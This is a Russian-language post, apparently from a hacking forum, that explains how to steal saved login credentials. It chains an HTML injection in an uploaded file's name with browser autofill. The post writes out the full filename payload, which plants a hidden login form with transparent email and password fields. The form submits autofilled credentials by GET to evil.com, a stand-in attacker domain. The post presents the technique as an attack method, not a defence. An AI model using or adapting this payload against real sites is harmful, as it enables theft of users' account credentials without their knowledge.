• Добро пожаловать на сайт - Forumteam.bet !

    Что бы просматривать темы форума необходимо зарегестрироваться или войти в свой аккаунт.

    Группа в телеграме (подпишитесь, что бы не потерять нас) - ForumTeam Chat [Подписатся]
    Связь с администратором - @ftmadmin

Использование функции автозаполнения для кражи учетных данных

Benzema

Публикатор
Команда форума
Регистрация
27.01.18
Веб-сайт
netysaita.com
TG
@@qq
1674294757226.png

В этой статье расскажем вам о способе кражи пользовательских данных с помощью HTML-инъекции на сайте и функции автозаполнения в браузере жертвы.

HTML инъекция​

Каждый мой ввод на этом сайте был корректно обработан приложением и потому мое внимание привлекла функция загрузки файлов. Мы можем загружать файлы, и есть общедоступная ссылка, которой мы можем поделиться с другими людьми, чтобы они тоже увидели мой файл. Я попытался обойти проверку расширения файла при загрузке, используя .svg, .html, .php, но мне не повезло. А затем я переименовал свой файл в <h1>xd.jpg и открыл его по общедоступной ссылке. Из-за имени файла произошла HTML-инъекция.

Итак, теперь у нас есть HTML-инъекция, следующая часть - это функция автосохранения.

Автозаполнение​

В основном, когда мы сохранили учетные данные для входа в нашем браузере и хотим снова войти на сайт, браузер автоматически заполняет поле логина и пароля, а нам просто нужно нажать на кнопку логина (входа).

Поэтому я создал форму входа и сделал поле адреса электронной почты и пароля невидимыми, установив opaсity:0 в CSS, а мое окончательное имя файла выглядело так:

"><form action="//evil.com" method="GET"><input type="text" name="u" style='opacity:0;'><input type="password" name="p" style='opacity:0;'><input type="submit" name="s" value="submit"><!--.jpg

eb09b3cc94df4d1e4a8b2.png

Здесь я могу получить общедоступную ссылку на загруженный мной файл.

18b0b42ab0ec0a0818877.png

Так выглядит страница после посещения общедоступного URL-адреса моего загруженного файла.

c977a0f3162a6d64845ce.png

Когда кто-либо нажимает на кнопку submit, его учетные данные для входа отправляются на сервер злоумышленника.

9d3a44ecc735e5ac5a392.png

Итак, как это работает? Поля ввода заполняются автоматически благодаря функции автосохранения, а style="opacity:0;" скроет детали, отображаемые на странице. При нажатии submit информация автоматически отправляется на evil.com, из-за установки METHOD='GET' учетные данные для входа будут отправлены c GET запросом на evil.com, который является доменом злоумышленника. Последние символы <!-- закомментируют оставшийся HTML.
 
Telegram
@qq
Сверху Снизу